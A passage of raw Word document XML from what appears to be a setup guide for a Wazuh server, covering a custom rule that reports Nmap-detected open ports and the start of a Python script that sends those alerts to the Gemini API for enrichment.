        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3EE9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3EE9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Using the Python script directly ensures Nmap is found via PATH. Compiling to .exe may fail if Python cannot locate Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E65544" w14:textId="110D451E" w:rsidR="007B3EE9" w:rsidRPr="00567DF6" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A235606" w14:textId="77777777" w:rsidR="006B7653" w:rsidRPr="006B7653" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3EE9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Wazuh </w:t>
      </w:r>
      <w:r w:rsidR="006B7653" w:rsidRPr="006B7653">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Server </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3461C614" w14:textId="2EA32C12" w:rsidR="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3EE9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Rule for Nmap </w:t>
      </w:r>
      <w:r w:rsidR="006B7653">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">at </w:t>
      </w:r>
      <w:r w:rsidR="006B7653" w:rsidRPr="006B7653">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>/var/ossec/etc/rules/local_rules.xml</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6B7653" w14:paraId="7F94CEDD" w14:textId="77777777" w:rsidTr="006B7653">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="247420CB" w14:textId="77777777" w:rsidR="006B7653" w:rsidRPr="007B3EE9" w:rsidRDefault="006B7653" w:rsidP="006B7653">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t>&lt;group name="windows,nmap,"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="161AD5C7" w14:textId="77777777" w:rsidR="006B7653" w:rsidRPr="007B3EE9" w:rsidRDefault="006B7653" w:rsidP="006B7653">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t xml:space="preserve">  &lt;rule id="100100" level="3"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E87F874" w14:textId="77777777" w:rsidR="006B7653" w:rsidRPr="007B3EE9" w:rsidRDefault="006B7653" w:rsidP="006B7653">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t xml:space="preserve">       &lt;decoded_as&gt;json&lt;/decoded_as&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="615346B7" w14:textId="77777777" w:rsidR="006B7653" w:rsidRPr="007B3EE9" w:rsidRDefault="006B7653" w:rsidP="006B7653">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t xml:space="preserve">       &lt;field name="nmap_port"&gt;\.+&lt;/field&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52CCCCBF" w14:textId="77777777" w:rsidR="006B7653" w:rsidRPr="007B3EE9" w:rsidRDefault="006B7653" w:rsidP="006B7653">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t xml:space="preserve">       &lt;field name="nmap_port_service"&gt;\.+&lt;/field&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15D7954E" w14:textId="77777777" w:rsidR="006B7653" w:rsidRPr="007B3EE9" w:rsidRDefault="006B7653" w:rsidP="006B7653">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t xml:space="preserve">       &lt;description&gt;NMAP: Host scan. Port $(nmap_port) is open and hosting the $(nmap_port_service) service.&lt;/description&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A87839E" w14:textId="77777777" w:rsidR="006B7653" w:rsidRPr="007B3EE9" w:rsidRDefault="006B7653" w:rsidP="006B7653">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t xml:space="preserve">       &lt;options&gt;no_full_log&lt;/options&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BD0F34F" w14:textId="77777777" w:rsidR="006B7653" w:rsidRPr="007B3EE9" w:rsidRDefault="006B7653" w:rsidP="006B7653">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t xml:space="preserve">  &lt;/rule&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A12C5EF" w14:textId="77777777" w:rsidR="006B7653" w:rsidRPr="007B3EE9" w:rsidRDefault="006B7653" w:rsidP="006B7653">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t>&lt;/group&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7995B6DA" w14:textId="77777777" w:rsidR="006B7653" w:rsidRDefault="006B7653" w:rsidP="006B7653">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="018E32CD" w14:textId="77777777" w:rsidR="006B7653" w:rsidRPr="007B3EE9" w:rsidRDefault="006B7653" w:rsidP="007B3EE9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F4AACCE" w14:textId="056A4D83" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3EE9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Restart Wazuh manager after updating rul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6B7653" w:rsidRPr="001E2C55" w14:paraId="7EB041C1" w14:textId="77777777" w:rsidTr="006B7653">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="2D7BBA8B" w14:textId="560DA95A" w:rsidR="006B7653" w:rsidRPr="006B7653" w:rsidRDefault="006B7653" w:rsidP="006B7653">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t>sudo systemctl restart wazuh-manager</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0062280B" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69A343B9" w14:textId="211D15AC" w:rsidR="009A7B95" w:rsidRDefault="009A7B95" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14C44F85" wp14:editId="7F5B4081">
            <wp:extent cx="6637020" cy="1257300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14793458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020" cy="1257300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B72AC1E" w14:textId="77777777" w:rsidR="009A7B95" w:rsidRDefault="009A7B95" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B6059AD" w14:textId="0637AE0E" w:rsidR="009A7B95" w:rsidRPr="007B3EE9" w:rsidRDefault="009A7B95" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7490BAAC" wp14:editId="171A1A1A">
            <wp:extent cx="6621780" cy="502920"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="196587428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780" cy="502920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED5B976" w14:textId="77777777" w:rsidR="009A7B95" w:rsidRDefault="009A7B95" w:rsidP="00462151">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="507DD5A2" w14:textId="0941DD5C" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00462151">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Gemini Integration — Wazuh Enrichment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC74594" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00462151">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>The Gemini integration enriches Nmap alerts with AI-generated insights about each detected service, including:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC546D7" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00462151">
        <w:t>Service explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3B5430" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00462151">
        <w:t>Known vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0819841E" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00462151">
        <w:t>Operational recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAAD4EA" w14:textId="6BB3A5D0" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00462151">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Gemini is deployed on the Wazuh manager, not on the agent. It consumes Nmap alert JSON sent from agents and posts the enriched alert back into Wazuh for UI display.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B6D1C6" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
      <w:r w:rsidRPr="00462151">
        <w:t>Files and Locations</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grilledutableau"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1654"/>
        <w:gridCol w:w="4850"/>
        <w:gridCol w:w="3952"/>
      </w:tblGrid>
      <w:tr w:rsidR="00462151" w:rsidRPr="00462151" w14:paraId="162D0579" w14:textId="77777777" w:rsidTr="00462151">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E9A7EAE" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:r w:rsidRPr="00462151">
              <w:t>File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67FACCD3" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:r w:rsidRPr="00462151">
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B909EE9" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:r w:rsidRPr="00462151">
              <w:t>Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00462151" w:rsidRPr="001E2C55" w14:paraId="4A6C49A6" w14:textId="77777777" w:rsidTr="00462151">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5837A89B" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:r w:rsidRPr="00462151">
              <w:t>custom-gemini.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A4C1E3E" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00567DF6" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00567DF6">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>Python integration script to query Gemini API and send enriched alerts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05312BDC" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00567DF6" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00567DF6">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>/var/ossec/integrations/custom-gemini.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00462151" w:rsidRPr="00462151" w14:paraId="4223AC48" w14:textId="77777777" w:rsidTr="00462151">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37523E05" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:r w:rsidRPr="00462151">
              <w:t>test-alert.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6922220D" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00567DF6" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00567DF6">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>Sample alert for manual testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D813D90" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:r w:rsidRPr="00462151">
              <w:t>/tmp/test-alert.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D95205E" w14:textId="60B7208E" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151"/>
    <w:p w14:paraId="0D07AAAA" w14:textId="6C68D368" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
      <w:r w:rsidRPr="00462151">
        <w:t xml:space="preserve">custom-gemini.py </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2B009D" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00462151">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Reads alerts in JSON format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC38477" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00462151">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Checks for nmap_port_service field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBDA5C5" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00462151">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Calls Gemini API using gemini-2.0-flash model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8D368E" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00462151">
        <w:t>Receives AI-generated text summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA0F7AE" w14:textId="28502D50" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00462151">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Sends enriched alert back to Wazuh using Unix socke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462151" w14:paraId="35AC413E" w14:textId="77777777" w:rsidTr="00462151">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="321AA301" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t>#!/var/ossec/framework/python/bin/python3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42EC1BA1" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t># Copyright (C) 2015-2023, Wazuh Inc.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76ECC727" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t># Gemini Integration for Nmap Enrichment</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74A110EF" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6213A512" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t>import json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26B0944F" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t>import sys</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F365C56" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t>import time</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43812D94" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t>import os</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DBE548A" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t>from socket import socket, AF_UNIX, SOCK_DGRAM</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19BE20CE" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2DFD3D2D" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t>try:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6720C5FB" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">    import requests</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F5817D4" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t>except Exception as e:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21972491" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">    print("No module 'requests' found. Install: pip install requests")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E628E97" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">    sys.exit(1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66050E5F" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6B053258" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t># Globals</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41694005" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t>debug_enabled = True   # set False in production</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DC9E8F0" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t>pwd = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45FA3952" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
